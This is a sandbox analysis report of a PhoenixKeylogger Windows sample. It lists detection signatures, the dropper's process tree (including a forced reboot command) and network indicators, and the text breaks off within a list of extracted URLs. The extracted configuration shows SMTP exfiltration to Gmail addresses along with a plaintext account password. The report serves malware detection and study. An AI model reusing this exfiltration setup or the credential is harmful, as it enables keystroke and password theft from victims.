Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2cB42TzofC

Overview

General Information

Sample Name:2cB42TzofC (renamed file extension from none to exe)
Analysis ID:565576
MD5:f47ddf38902e6e745ae49168bc55c0fc
SHA1:e7cc7bd70b128d63ef1e54345d6b97d8fd02ffb8
SHA256:0d2ada23e3ed12fff4c0e31377f1f577bcca7694b73545049a36f443d6c83215
Tags:32exetrojan
Infos:
Errors
  • Sigma runtime error: Invalid condition: ( false && false || false Rule: Logon Scripts (UserInitMprLogonScript)

Detection

PhoenixKeylogger
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected PhoenixKeylogger
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Execution from Suspicious Folder
Sigma detected: WScript or CScript Dropper
Contains functionality to capture screen (.Net source)
.NET source code references suspicious native API functions
Uses shutdown.exe to shutdown or reboot the system
Sigma detected: Suspicious Remote Thread Created
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Sigma detected: Suspicious Outbound SMTP Connections
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • 2cB42TzofC.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\2cB42TzofC.exe" MD5: F47DDF38902E6E745AE49168BC55C0FC)
    • systems.exe (PID: 2880 cmdline: "C:\Users\Public\Downloads\systems.exe" MD5: 9FBC8CDC78C518EBF6774752EC178B13)
      • explorer.exe (PID: 6304 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 160 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6040 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 7076 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6196 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6496 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 2584 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6824 cmdline: "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • wscript.exe (PID: 6976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 7076 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 5936 cmdline: shutdown -r -t 50 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
  • explorer.exe (PID: 6756 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4324 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 2920 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6912 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 360 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5292 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 4104 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: PhoenixKeylogger

{"Exfil Mode": "SMTP", "To": "emre.alagoz.44@gmail.com", "From": "keylogar99@gmail.com", "SMTP Server": "smtp.gmail.com", "Password": "10203040eam.", "port": "587"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\systems.exeJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
    C:\Users\Public\Downloads\systems.exeINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
    • 0x12d90:$s1: UnHook
    • 0x12d2c:$s2: SetHook
    • 0x12d65:$s3: CallNextHook
    • 0x12473:$s4: _hook
    C:\Users\Public\Downloads\systems.exeMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
    • 0x1269e:$s2: StartKeylogger
    • 0x1314d:$s3: CRYPTPROTECT_
    • 0x1316e:$s3: CRYPTPROTECT_
    • 0x1318d:$s3: CRYPTPROTECT_
    • 0x16dc2:$m2: - Clipboard -------|
    • 0x17076:$m3: - Logs -------|
    • 0x17467:$m4: - Passwords -------|
    • 0x1749f:$m5: PSWD
    • 0x170a4:$m7: Logs |

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
      00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmpMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
      • 0x1249e:$s2: StartKeylogger
      • 0x12f4d:$s3: CRYPTPROTECT_
      • 0x12f6e:$s3: CRYPTPROTECT_
      • 0x12f8d:$s3: CRYPTPROTECT_
      • 0x16bc2:$m2: - Clipboard -------|
      • 0x16e76:$m3: - Logs -------|
      • 0x17267:$m4: - Passwords -------|
      • 0x1729f:$m5: PSWD
      • 0x16ea4:$m7: Logs |
      00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
        00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmpMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
        • 0x1249e:$s2: StartKeylogger
        • 0x12f4d:$s3: CRYPTPROTECT_
        • 0x12f6e:$s3: CRYPTPROTECT_
        • 0x12f8d:$s3: CRYPTPROTECT_
        • 0x16bc2:$m2: - Clipboard -------|
        • 0x16e76:$m3: - Logs -------|
        • 0x17267:$m4: - Passwords -------|
        • 0x1729f:$m5: PSWD
        • 0x16ea4:$m7: Logs |
        Process Memory Space: systems.exe PID: 2880JoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.0.systems.exe.220000.0.unpackJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
            7.0.systems.exe.220000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x12d90:$s1: UnHook
            • 0x12d2c:$s2: SetHook
            • 0x12d65:$s3: CallNextHook
            • 0x12473:$s4: _hook
            7.0.systems.exe.220000.0.unpackMALWARE_Win_PhoenixPhoenix/404KeyLogger keylogger payloadditekSHen
            • 0x1269e:$s2: StartKeylogger
            • 0x1314d:$s3: CRYPTPROTECT_
            • 0x1316e:$s3: CRYPTPROTECT_
            • 0x1318d:$s3: CRYPTPROTECT_
            • 0x16dc2:$m2: - Clipboard -------|
            • 0x17076:$m3: - Logs -------|
            • 0x17467:$m4: - Passwords -------|
            • 0x1749f:$m5: PSWD
            • 0x170a4:$m7: Logs |
            7.2.systems.exe.220000.0.unpackJoeSecurity_PhoenixKeyloggerYara detected PhoenixKeyloggerJoe Security
              7.2.systems.exe.220000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x12d90:$s1: UnHook
              • 0x12d2c:$s2: SetHook
              • 0x12d65:$s3: CallNextHook
              • 0x12473:$s4: _hook
              Click to see the 1 entries

              Sigma Overview

              System Summary

              barindex
              Sigma detected: Suspicious Program Location with Network Connections
              Source: Network ConnectionAuthor: Florian Roth: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Downloads\systems.exe, Initiated: true, ProcessId: 2880, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49717
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\Downloads\systems.exe" , CommandLine: "C:\Users\Public\Downloads\systems.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\systems.exe, NewProcessName: C:\Users\Public\Downloads\systems.exe, OriginalFileName: C:\Users\Public\Downloads\systems.exe, ParentCommandLine: "C:\Users\user\Desktop\2cB42TzofC.exe" , ParentImage: C:\Users\user\Desktop\2cB42TzofC.exe, ParentProcessId: 6400, ProcessCommandLine: "C:\Users\Public\Downloads\systems.exe" , ProcessId: 2880
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\2cB42TzofC.exe" , ParentImage: C:\Users\user\Desktop\2cB42TzofC.exe, ParentProcessId: 6400, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" , ProcessId: 6976
              Sigma detected: Suspicious Remote Thread Created
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\explorer.exe, SourceProcessId: 7076, StartAddress: 742914E0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 7076
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.177.127.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Downloads\systems.exe, Initiated: true, ProcessId: 2880, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49718

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\Public\Downloads\systems.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
              Found malware configuration
              Source: 7.2.systems.exe.220000.0.unpackMalware Configuration Extractor: PhoenixKeylogger {"Exfil Mode": "SMTP", "To": "emre.alagoz.44@gmail.com", "From": "keylogar99@gmail.com", "SMTP Server": "smtp.gmail.com", "Password": "10203040eam.", "port": "587"}
              Multi AV Scanner detection for submitted file
              Source: 2cB42TzofC.exeReversingLabs: Detection: 82%
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Downloads\systems.exeReversingLabs: Detection: 89%
              Machine Learning detection for sample
              Source: 2cB42TzofC.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Downloads\systems.exeJoe Sandbox ML: detected
              Source: 7.2.systems.exe.220000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 7.0.systems.exe.220000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 2cB42TzofC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 2cB42TzofC.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 2cB42TzofC.exe
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0A7E7 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00A0A7E7
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1BB70 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00A1BB70
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2ADB8 FindFirstFileExA,1_2_00A2ADB8

              Networking

              barindex
              May check the online IP address of the machine
              Source: C:\Users\Public\Downloads\systems.exeDNS query: name: ifconfig.me
              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
              Source: global trafficTCP traffic: 192.168.2.3:49718 -> 108.177.127.108:587
              Source: global trafficTCP traffic: 192.168.2.3:49723 -> 108.177.127.109:587
              Source: global trafficTCP traffic: 192.168.2.3:49718 -> 108.177.127.108:587
              Source: global trafficTCP traffic: 192.168.2.3:49723 -> 108.177.127.109:587
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gt
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457758116.0000000006177000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818255606.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
              Source: systems.exe, 00000007.00000003.407930819.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407495049.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.408174010.0000000006EE9000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407336462.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.408068459.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407649600.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407793751.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
              Source: systems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824520229.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449653969.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449871222.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450875400.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450170584.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450609069.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452067543.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wikipedia
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457758116.0000000006177000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818255606.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457758116.0000000006177000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 